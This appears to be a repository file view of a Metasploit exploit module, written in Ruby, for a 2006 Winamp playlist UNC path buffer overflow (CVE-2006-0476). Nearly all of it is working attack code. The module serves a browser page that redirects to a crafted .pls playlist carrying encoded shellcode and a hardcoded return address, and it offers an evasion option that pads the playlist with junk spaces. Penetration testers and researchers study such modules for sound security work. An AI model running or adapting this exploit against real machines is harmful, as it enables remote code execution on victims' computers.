root / modules / exploits / windows / browser / winamp_playlist_unc.rb @ master
History | View | Annotate | Download (3.8 kB)
| 1 |
##
|
|---|---|
| 2 |
# $Id$
|
| 3 |
##
|
| 4 |
|
| 5 |
##
|
| 6 |
# This file is part of the Metasploit Framework and may be subject to
|
| 7 |
# redistribution and commercial restrictions. Please see the Metasploit
|
| 8 |
# web site for more information on licensing and terms of use.
|
| 9 |
# http://metasploit.com/
|
| 10 |
##
|
| 11 |
|
| 12 |
require 'msf/core'
|
| 13 |
|
| 14 |
class Metasploit3 < Msf::Exploit::Remote |
| 15 |
Rank = GreatRanking |
| 16 |
|
| 17 |
#
|
| 18 |
# This module acts as an HTTP server
|
| 19 |
#
|
| 20 |
include Msf::Exploit::Remote::HttpServer::HTML |
| 21 |
|
| 22 |
def initialize(info = {}) |
| 23 |
super(update_info(info,
|
| 24 |
'Name' => 'Winamp Playlist UNC Path Computer Name Overflow', |
| 25 |
'Description' => %q{ |
| 26 |
This module exploits a vulnerability in the Winamp media player. |
| 27 |
This flaw is triggered when a audio file path is specified, inside a |
| 28 |
playlist, that consists of a UNC path with a long computer name. This |
| 29 |
module delivers the playlist via the browser. This module has only |
| 30 |
been successfully tested on Winamp 5.11 and 5.12. |
| 31 |
},
|
| 32 |
'License' => MSF_LICENSE, |
| 33 |
'Author' =>
|
| 34 |
[ |
| 35 |
'hdm',
|
| 36 |
'Faithless <rhyskidd[at]gmail.com>'
|
| 37 |
], |
| 38 |
'Version' => '$Revision$', |
| 39 |
'References' =>
|
| 40 |
[ |
| 41 |
['CVE', '2006-0476'], |
| 42 |
['OSVDB', '22789'], |
| 43 |
['BID', '16410'], |
| 44 |
], |
| 45 |
'DefaultOptions' =>
|
| 46 |
{
|
| 47 |
'EXITFUNC' => 'process', |
| 48 |
}, |
| 49 |
'Payload' =>
|
| 50 |
{
|
| 51 |
'Space' => 526, |
| 52 |
'BadChars' => "\x00\x5c\x2f\x0a\x0d\x20", |
| 53 |
'Compat' =>
|
| 54 |
{
|
| 55 |
'ConnectionType' => '-find', |
| 56 |
}, |
| 57 |
|
| 58 |
# Landing on \x5c\x5c trashes esp, restore from ecx
|
| 59 |
'PrependEncoder' => "\x87\xe1", |
| 60 |
'StackAdjustment' => -3500, |
| 61 |
|
| 62 |
# Dont need them, dont want them, preserve esi
|
| 63 |
'DisableNops' => true, |
| 64 |
|
| 65 |
}, |
| 66 |
'Platform' => 'win', |
| 67 |
'Targets' =>
|
| 68 |
[ |
| 69 |
# Return to exe, but don't clobber ecx, 0x0d is replaced by 0x00
|
| 70 |
[ 'Winamp 5.12 Universal', { 'Ret' => 0x0d45fece }], |
| 71 |
], |
| 72 |
'DisclosureDate' => 'Jan 29 2006', |
| 73 |
'DefaultTarget' => 0)) |
| 74 |
|
| 75 |
register_evasion_options( |
| 76 |
[ |
| 77 |
OptBool.new('PlaylistSpaceInjection', [false, 'Add junk spaces in between each entry item in the playlist"', 'false']) |
| 78 |
]) |
| 79 |
end
|
| 80 |
|
| 81 |
def on_request_uri(cli, request) |
| 82 |
|
| 83 |
if (not request.uri.match(/\.pls$/i)) |
| 84 |
if ("/" == get_resource[-1,1]) |
| 85 |
pls_uri = get_resource[0, get_resource.length - 1] |
| 86 |
else
|
| 87 |
pls_uri = get_resource |
| 88 |
end
|
| 89 |
pls_uri << "/" + rand_text_alphanumeric(rand(80)+16) + ".pls" |
| 90 |
html = |
| 91 |
"<html><body>"+
|
| 92 |
"<script>" +
|
| 93 |
"document.location='#{pls_uri}'</script>" +
|
| 94 |
"One second please...</body></html>"
|
| 95 |
send_response_html(cli, html) |
| 96 |
return
|
| 97 |
end
|
| 98 |
|
| 99 |
# Re-generate the payload
|
| 100 |
return if ((p = regenerate_payload(cli)) == nil) |
| 101 |
|
| 102 |
print_status("Sending #{self.name}")
|
| 103 |
|
| 104 |
# Transmit the compressed response to the client
|
| 105 |
send_response(cli, generate_playlist(p), { 'Content-Type' => 'text/plain' })
|
| 106 |
|
| 107 |
# Handle the payload
|
| 108 |
handler(cli) |
| 109 |
end
|
| 110 |
|
| 111 |
def generate_playlist(payload) |
| 112 |
|
| 113 |
pcnt = rand(10)+10; |
| 114 |
|
| 115 |
file = rand_text_english(1026)
|
| 116 |
file[1022 , 4] = [target.ret].pack('V') |
| 117 |
file[0, payload.encoded.length] = payload.encoded
|
| 118 |
|
| 119 |
play = |
| 120 |
"[playlist]\r\n" +
|
| 121 |
generate_songs(pcnt) + |
| 122 |
generate_song(pcnt + 1, "\\\\#{file}") + |
| 123 |
generate_line('NumberOfEntries', "#{pcnt+1}") + |
| 124 |
generate_line('Version', '2') |
| 125 |
return play
|
| 126 |
end
|
| 127 |
|
| 128 |
def generate_space |
| 129 |
if datastore['PlaylistSpaceInjection'] == true |
| 130 |
return rand_text(rand(100)+1, nil, " \t") |
| 131 |
else
|
| 132 |
return '' |
| 133 |
end
|
| 134 |
end
|
| 135 |
|
| 136 |
def generate_song(id, file) |
| 137 |
return generate_line("File#{id}", file) + |
| 138 |
generate_line("Title#{id}", rand_text_alphanumeric(rand(64)+1)) + |
| 139 |
generate_line("Length#{id}", "%x" % (rand(1024) + 30)) |
| 140 |
end
|
| 141 |
|
| 142 |
def generate_line(key, value) |
| 143 |
return generate_space + key + generate_space + '=' + generate_space + value + generate_space + "\r\n" |
| 144 |
end
|
| 145 |
|
| 146 |
def generate_songs(cnt) |
| 147 |
songs = ''
|
| 148 |
1.upto(cnt) do |i| |
| 149 |
songs << generate_song(i, rand_text_alphanumeric(rand(64)+1)) |
| 150 |
end
|
| 151 |
return songs
|
| 152 |
end
|
| 153 |
|
| 154 |
end
|